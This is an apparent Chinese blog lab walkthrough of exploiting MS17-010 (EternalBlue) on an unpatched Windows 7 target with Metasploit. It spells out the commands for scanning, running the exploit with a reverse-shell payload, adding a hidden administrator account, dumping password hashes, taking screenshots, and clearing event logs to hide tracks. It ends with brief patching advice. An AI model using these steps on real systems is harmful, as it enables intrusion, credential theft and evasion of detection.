Windows下的MS17-010(永恒之蓝)漏洞分析与复现
目录
一、漏洞简介
1、永恒之蓝:
2、漏洞原理:
3、影响版本:
二、复现环境
三、漏洞复现
1、使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态
2、启动kali自带的msf,显示msf6>后说明已经进入msf了
3、搜寻永恒之蓝漏洞(MS17-010)可使用的攻击模块
4、使用相应模块auxiliary/scanner/smb/smb_ms17_010对靶机进行验证,验证靶机是否存在永恒之蓝漏洞(MS17-010),可直接使用模块前面对应的数字,效果相同
5、查询配置,yes 全部需要手动配置,配置已经存在的,可以使用它给的默认配置也可以对该配置进行更改,no 就无需理会
6、使用exploit或run命令进行攻击,显示靶机存在永恒之蓝漏洞(MS17-010)
7、正式开始攻击。换用攻击模块exploit/windows/smb/ms17_010_eternalblue对应前面的数字为0(我的此攻击模块对应前面的数字是0)
8.使用exploit或run命令进行攻击,这时靶机会反弹一个会话,然后可以进行下一步操作,比如查看靶机版本信息或者获取靶机的shell权限等
9、对靶机进行一系列操作
四、永恒之蓝漏洞解决办法
一、漏洞简介
1、永恒之蓝:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。
2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
补充:
“445端口是TCP共享服务 445端口它将尝试同时连接到端口139和445。如果端口445有响应,它将向端口139发送TCPRST数据包,以断开并继续与端口455的通信;当端口445没有响应时,使用端口139。”
“139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。在Internet上共享自己的硬盘可能是最常见的问题。139属于TCP协议。”
3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
二、复现环境
攻击机:kali-Linux-2022.2(IP:192.168.50.133/24)
靶机:Windows 7(IP:192.168.50.159/24)
kali-Linux-2022.2镜像下载地址:https://www.kali.org/get-kali/#kali-bare-metal
Windows 7镜像下载地址:https://msdn.itellyou.cn/
kali-Linux-2022.2和Windows 7能够相互ping通,Windows 7靶机关闭防火墙,开启445端口(默认端口开启),Windows 7靶机不要打补丁
三、漏洞复现
1、使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态
nmap 192.168.50.159
2、启动kali自带的msf,显示msf6>后说明已经进入msf了
msfconsole
3、搜寻永恒之蓝漏洞(MS17-010)可使用的攻击模块
search ms17-010
4、使用相应模块auxiliary/scanner/smb/smb_ms17_010对靶机进行验证,验证靶机是否存在永恒之蓝漏洞(MS17-010),可直接使用模块前面对应的数字,效果相同
use 3
5、查询配置,yes 全部需要手动配置,配置已经存在的,可以使用它给的默认配置也可以对该配置进行更改,no 就无需理会
show options
我这里只需配置RHOSTS(靶机IP地址)就行了,其他默认
set rhosts 192.168.50.159
配置有效载荷,该步的作用是攻击机扫描完后,使靶机反弹回一个会话给攻击机建立连接
set payload windows/x64/meterpreter/reverse_tcp
6、使用exploit或run命令进行攻击,显示靶机存在永恒之蓝漏洞(MS17-010)
exploit
7、正式开始攻击。换用攻击模块exploit/windows/smb/ms17_010_eternalblue对应前面的数字为0(我的此攻击模块对应前面的数字是0)
use 0
重复第5步步骤,注意:执行show options命令后查看到yes对应的地方如果是空的需要全部配上
8.使用exploit或run命令进行攻击,这时靶机会反弹一个会话,然后可以进行下一步操作,比如查看靶机版本信息或者获取靶机的shell权限等
run
9、对靶机进行一系列操作
查看系统信息
sysinfo
反弹shell
shell
可以创建用户
net user xxxx 1234 /add(xxxx用户名 1234密码)
net localgroup administrators xxxx /add (将用户设置为管理员权限)
net user
得到账户hash,解码可以得到密码
hashdump
找到显示的路径可以看到受害者屏幕截图
screenshot
显示成功
记得保持清除日志的好习惯
clearev
四、永恒之蓝漏洞解决办法
1、开启防火墙
2、对系统进行升级或者打补丁
3、关闭相应的端口
Windows下的MS17-010(永恒之蓝)漏洞分析与复现相关推荐
- 永恒之蓝漏洞分析与防护技术
前言 自从上次快把HEVD栈溢出的博客写完,不小心手贱点关了,结果菜鸡的我一顿操作都没找回来,就不想写博客了(后来大佬说使用windbg附加,找到那块内存,dump出来就可以还原了,自己还是太年轻呀) ...
- 永恒之蓝漏洞分析与防范
漏洞利用原理 永恒之蓝漏洞的利用原理是通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行.在Windows操作系统中,SMB服务默认是开启的,监听端口默认为4 ...
- 可刑又可拷!永恒之蓝漏洞原理及复现
一.永恒之蓝介绍 1.什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. 2 ...
- MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...
- Windows 7 ms17-010永恒之蓝漏洞复现
Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...
- 【重要预警】“永恒之蓝”漏洞又现新木马 组成僵尸网络挖矿虚拟货币
WannaCry和UIWIX勒索软件在全世界掀起了轩然大波,但是利用"永恒之蓝"漏洞进行攻击的却不止这两个恶意软件.今日,亚信安全中国病毒响应中心发现了利用"永恒之蓝&q ...
- 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)
一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...
- MS17-010永恒之蓝漏洞的简谈与利用
MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
最新文章
- nginx 负载 sessionid 不一致_你不知道的Nginx负载均衡算法,快进来迅速掌握
- 清华学霸一天面试6家大厂-offer拿来吧你
- redis setnx 原子性_Redis从入门到深入-分布式锁(26)
- 趣谈网络协议笔记-二(第十七讲)
- svn 合并分支 等
- LSMW批处理使用方法(10)_步骤12、13
- Python基础教程:set集合的教程
- 失战于知识付费,会员与智能硬件将助蜻蜓FM打赢下半场战争?
- IBM、甲骨文、CNCF 就谷歌对 Istio 治理的处理提出抗议
- 第三十一期:世界上有四类人永远不可能成为编程界牛人(个人见解,欢迎补充)
- java查询SQLServer遇到问题:对象名无效。
- Linux学习一周初体验
- python工作技巧_4个基本的 Python 技巧让你的工作流程自动化
- Android音频框架笔记 - 下篇
- C语言 运算符与表达式
- 【内网穿透笔记】FTP映射出现227 Entering Passive Mode错误命令原因及解决方法
- IDEA 快捷键拆解系列(五):Navigate 篇
- 语音端点检测 php,几种语音端点检测方法简介
- 海量CAD图纸哪里获取呢?
- 定制嵌入式主板需要考虑的功能
热门文章
- char str[10]; str=string;
- 一周年感谢信 | 黑萤科技赖志宇:志同者将道合一处
- vue微信浏览器安卓正常 ios config 报错 “errMsg“:“config:invalid问题
- 计算机本科核心课程教学视频,绝对经典,有空温习温习~
- 四阶龙格库塔法c语言程序,四阶龙格_库塔算法的C语言实现_毋玉芝
- 基于51单片机和OLED屏幕的贪吃蛇游戏
- 2009年A股各板块龙头股大全(转载)
- 时隔多年,我胡汉三又回来了(大学毕业篇-迷茫)
- 用遗传算法,开启研究车间调度问题之门
- 【车间调度】FJSP评价指标